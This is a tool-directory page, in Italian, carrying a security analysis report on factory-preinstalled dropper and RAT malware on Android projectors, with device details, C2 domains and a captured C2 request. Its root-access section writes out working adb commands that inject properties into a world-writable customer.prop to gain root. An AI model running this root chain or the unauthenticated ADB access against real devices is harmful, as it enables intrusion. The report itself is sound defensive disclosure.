Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Android-Projector-C2-Malware — Analisi di una c2-network di beamers cinesi - SilentSDK-Analysis | Kitploit
Strumenti/GitHubGitHub/kavan00/android-projector-c2-malware
Sicurezza AndroidSicurezza Sistemi EmbeddedGestione degli Indicatori di Compromissione (IOC)Sicurezza IoTNetwork ForensicsReverse EngineeringAnalisi MalwareDigital ForensicsCommand and Control

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Threat Intelligence
Sicurezza della Supply Chain
Analisi del Firmware
GitHubkavan00/android-projector-c2-malware

Android-Projector-C2-Malware

Analisi di una c2-network di beamers cinesi - SilentSDK-Analysis

Vedi Repository
182665 mesi faNon ancora revisionato

Infrastruttura C2 Preinstallata e Payload RAT su Proiettori Android

Report di Analisi Tecnica — Ricerca sulla Sicurezza


Dispositivi interessati: Molteplici proiettori Android di marche come Nonete (es. Modello HY260Pro) (probabilmente anche diversi proiettori di Magcubic, Hotack, Huyukang e molti altri, poiché queste aziende distribuiscono modelli simili e ci sono indicazioni a supporto)
Piattaforma Chipset: Allwinner H713 / sun50iw12p1 — potenzialmente colpisce tutti i dispositivi su questa piattaforma
Periodo di analisi: 11–17 aprile 2026
Classificazione: Infrastruttura Command-and-Control preinstallata con payload Remote Access Trojan


TL;DR

  • Il problema: Numerosi proiettori Android economici (potenzialmente marchi come Magcubic, Hotack, ecc., che utilizzano il chip Allwinner H713), attualmente venduti in grandi quantità su Amazon, eBay e AliExpress, sono infetti da malware direttamente dalla fabbrica (Supply Chain Attack, simile ai casi "BADBOX").
  • Il meccanismo: Un'app di sistema apparentemente innocua ("StoreOS") agisce come un dropper mascherato. Scarica completamente in silenzio uno Stage-2-Dropper chiamato "SilentSDK" in background e lo installa con privilegi di sistema massimi, che a sua volta installa un RAT modulare basato su plugin e consapevole dell'architettura e un possibile framework di phishing.
  • Il pericolo: Il malware stabilisce una connessione C2 verso la Cina (api.pixelpioneerss.com), estrae ID di dispositivo sensibili e può scaricare ed eseguire codice malevolo arbitrario aggiuntivo con privilegi di root in qualsiasi momento (chmod 777). Inoltre, i dispositivi presentano backdoor di root aperte.
  • Mitigazione immediata: I domini C2 (specialmente *.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) devono essere bloccati a livello di rete. Gli utenti colpiti possono solo disabilitare manualmente le app dannose tramite ADB, poiché sono profondamente integrate nel sistema.

Avviso di Urgenza

L'infrastruttura malware documentata in questo report è preinstallata su proiettori Android attualmente venduti in grandi quantità ai consumatori finali su Amazon, eBay e AliExpress. I dispositivi colpiti potrebbero includere più marche (Hotack, Huyukang, Magcubic, Nonete, tra gli altri). Un'infrastruttura C2 identica è stata confermata indipendentemente su altri dispositivi dello stesso produttore (vedi Sezione 13). Lo schema corrisponde ai casi BADBOX.


Indice

  1. Identificazione del dispositivo
  2. Flusso di lavoro dell'indagine
  3. Accesso root — Percorso di exploit
  4. Risposta del server C2 — Prove principali
  5. Panoramica dell'ecosistema malware
  6. StoreOS — Analisi del dropper (com.htc.storeos)
  7. EventUploadService — Telemetria (com.htc.eventuploadservice)
  8. ExpandSDK — Iniezione pubblicitaria (com.htc.expandsdk)
  9. SilentSDK — Analisi dello Stage-2-Dropper (com.hotack.silentsdk)
  10. Il malware
  11. Backdoor di sistema
  12. Analisi forense di rete
  13. Spoofing del dispositivo (Build-Fingerprint Spoofing)
  14. Conferma esterna
  15. Indicatori di Compromissione (IOC)
  16. Mappatura MITRE ATT&CK
  17. Mitigazioni immediate
  18. Fonti

Dispositivo acquistato: Link Amazon - Nonete Mini Beamer 4K 1080P


1. Identificazione del dispositivo

ProprietàValore
Nome del marchioNonete HY260Pro (modello venduto da più aziende)
Nome modello internoNT10
SoCAllwinner sun50iw12p1 (ARM 32-bit)
Sistema operativoSpectraOS (Android 11, Kernel 5.4.99)
Impronta di build realeAllwinner/h713_tuna_p3/h713-tuna_p3:11
Impronta di build falsificataADT-3/adt3/adt3:11/RP1A.201005.006
SELinuxPermissive (nessuna applicazione)
Chiave di firma della piattaformaChiave di test AOSP pubblica
Certificato OEMCN=蓝鲨, OU=www.bsh.me, C=CN
Canale firmwareHY260Pro_SpectraOS_TPYB

Nota sull'ambito: Il chipset Allwinner H713 è integrato in numerosi proiettori Android economici venduti sotto marchi che cambiano nel mercato europeo. La base firmware identica (h713_tuna_p3) e l'operatore C2 identico (Shenzhen Aodin Technology) suggeriscono fortemente che tutti i dispositivi di questo OEM contengano la stessa infrastruttura.


2. Flusso di lavoro dell'indagine

PassoAzioneRisultato
1Cattura del traffico di rete con WiresharkTraffico HTTP verso store-api.aodintech.com
2Decodifica della risposta C2 compressa con gzip7 app, inclusa la nascosta "SilentTools"
3Decifratura AES-CBC del percorso di downloadChiave [REDACTED], URL al file .bpp
4Exploit root tramite /oem/customer.propuid=0(root) dopo l'iniezione di proprietà
5Dump forense di /data, /oem, /systemAPK, database, configurazioni
6Analisi statica del DEX di StoreOSpm install -r -d, protezione di inversione dei byte
7Reverse engineering del meccanismo reverseLenComprensione della protezione anti-analisi
8Rottura della protezione di inversione dei byteDEX di SilentSDK decifrato e analizzabile
9Decifratura XOR delle stringhe di SilentSDKDominio C2 api.pixelpioneerss.com confermato
10Verifica degli hash da tre fontiMD5/SHA-256 corrispondono perfettamente
11Reverse engineering del processo di download del malwareServer ancora online
12Reverse engineering del malwareFramework RAT basato su plugin

3. Accesso root — Percorso di exploit

L'accesso root è stato ottenuto attraverso una combinazione di tre vulnerabilità:

  1. SELinux Permissive — Le violazioni di accesso vengono solo registrate, non bloccate.
  2. /oem scrivibile da tutti — La partizione è montata come FAT con fmask=0000.
  3. customer.prop caricato all'avvio — Sovrascrive le proprietà di sistema.```bash adb shell getenforce # Result: Permissive adb shell ls -la /oem/ # All files world-writable

adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'

adb reboot && adb wait-for-device && adb root adb shell id

uid=0(root) gid=0(root) context=u:r:su:s0

**Impatto:** Qualsiasi utente con accesso fisico o un attaccante sulla stessa rete (tramite ADB, porta 5555 aperta, nessuna autenticazione) ottiene pieno accesso root.

---

## 4. Risposta del Server C2 — Prove Principali

### Richiesta HTTP Catturata```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12

Risposta del Server (Decodificato da pcapng - Tabella)

La risposta compressa gzip contiene un elenco JSON di sette app. Sei di esse sono app di streaming regolari (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). La settima è SilentTools:

AppPackageisShowisForceisSilent InstallisSilent Uninstalllaunch Type
YouTubecom.google.android.youtube.tvtruefalsefalsefalse0
Disney+com.disney.disneyplustruefalsefalsefalse0
Netflixcom.netflix.mediaclienttruefalsefalsefalse0
Chromecom.android.chrometruefalsefalsefalse0
Prime Videocom.amazon.amazonvideo.livingroomtruefalsefalsefalse0
BrowseHerecom.tcl.browsertruefalsefalsefalse0
SilentToolscom.hotack.silentsdkfalsetruefalsetrue1
Scarica lo strumento